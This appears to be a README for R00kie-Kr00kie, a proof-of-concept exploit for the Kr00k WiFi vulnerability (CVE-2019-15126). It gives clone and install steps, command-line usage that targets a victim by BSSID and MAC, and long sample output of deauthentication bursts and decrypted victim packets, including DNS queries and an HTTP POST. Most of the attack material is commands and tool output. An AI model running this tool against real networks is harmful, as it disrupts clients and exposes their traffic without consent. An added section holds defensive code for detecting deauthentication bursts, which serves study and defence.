R00kie-Kr00kie : PoC Exploit For The CVE-2019-15126 Kr00k Vulnerability

R00kie-Kr00kie is a PoC exploit for the CVE-2019-15126 kr00k vulnerability. This project is intended for educational purposes only and cannot be used for law violation or personal gain. The author of this project is not responsible for any possible harm caused by the materials.

Requirements

To use these scripts, you will need a WiFi card that supports active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n), which we used to develop and test the code. We have tested this PoC on Kali Linux.

Installation

# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt


How to use?

Script: r00kie-kr00kie.py

This is the main exploit file that implements the kr00k attack.

->~:python3 r00kie-kr00kie.py -h

Usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

Optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set number of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output

To start an attack, you need to know the BSSID of the access point, its channel and the MAC address of the victim. You can find all three with the airodump-ng wlan0 utility.

Run the exploit:

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
[ UDP ]
sport = 60744
dport = domain
len = 40
chksum = 0xa649
[ DNS ]
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
[ UDP ]
sport = 60744
dport = domain
len = 40
chksum = 0x104b
[ DNS ]
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None

Also, if you have already intercepted traffic (a pcap file) after the kr00k attack, you can decrypt it:

->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
[ Raw ]
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
[ Raw ]
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
[ TCP ]
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap
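Added example, not part of the r00kie-kr00kie project: every kr00k iteration above starts with a burst of deauthentication frames (five per iteration by default), and that burst is visible to any monitor-mode sensor, so a simple WIDS check is to count deauths per (station, BSSID) pair in a sliding time window. The threshold, the window length and the sample capture below are assumptions constructed for this demo, and the frame parser expects raw 802.11 frames without a radiotap header.

```python
import struct
from collections import defaultdict, deque

# Frame-control byte 0 of an 802.11 Deauthentication frame (type 00, subtype 1100).
DEAUTH_FC0 = 0xC0

def parse_deauth(frame: bytes):
    """Return (receiver, transmitter, reason_code) for a raw 802.11 deauth frame
    (no radiotap header), or None for any other frame."""
    if len(frame) < 26 or frame[0] & 0xFC != DEAUTH_FC0:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    receiver = mac(frame[4:10])       # addr1: the station being kicked off
    transmitter = mac(frame[10:16])   # addr2: claims to be the AP (spoofable)
    reason = struct.unpack("<H", frame[24:26])[0]
    return receiver, transmitter, reason

def detect_deauth_bursts(capture, threshold=5, window=5.0):
    """capture: iterable of (timestamp_seconds, raw_frame). Emit one alert
    (first_ts, last_ts, station, bssid, count) whenever at least `threshold`
    deauths for the same (station, bssid) pair arrive within `window` seconds."""
    recent = defaultdict(deque)
    alerts = []
    for ts, raw in capture:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        station, bssid, _reason = parsed
        times = recent[(station, bssid)]
        times.append(ts)
        while times and ts - times[0] > window:   # slide the window forward
            times.popleft()
        if len(times) >= threshold:
            alerts.append((times[0], ts, station, bssid, len(times)))
            times.clear()                         # one alert per burst
    return alerts

def build_deauth(station, bssid, reason=7):
    """Constructed test helper: minimal deauth frame (24-byte MAC header + reason)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    header = bytes([DEAUTH_FC0, 0]) + b"\x3a\x01" + mac(station) + mac(bssid) * 2 + b"\0\0"
    return header + struct.pack("<H", reason)

# Constructed sample capture, not a real trace: five deauths within 40 ms (the PoC's
# default of 5 per iteration), a lone deauth to another station, and one data frame.
VICTIM, AP = "88:c9:d0:fb:88:d1", "d4:38:9c:82:23:7a"
SAMPLE_CAPTURE = [(i * 0.01, build_deauth(VICTIM, AP)) for i in range(5)]
SAMPLE_CAPTURE += [(3.0, build_deauth("aa:bb:cc:dd:ee:01", AP, reason=3)),
                   (3.5, bytes([0x08, 0]) + bytes(22))]   # data frame, ignored
```

Running detect_deauth_bursts(SAMPLE_CAPTURE) yields a single alert for the victim station; feeding it frames read from a live monitor-mode interface or a pcap gives the same check over real traffic.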

Script: traffic_generator.py

This script generates UDP traffic from the victim to demonstrate the kr00k attack.

->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit
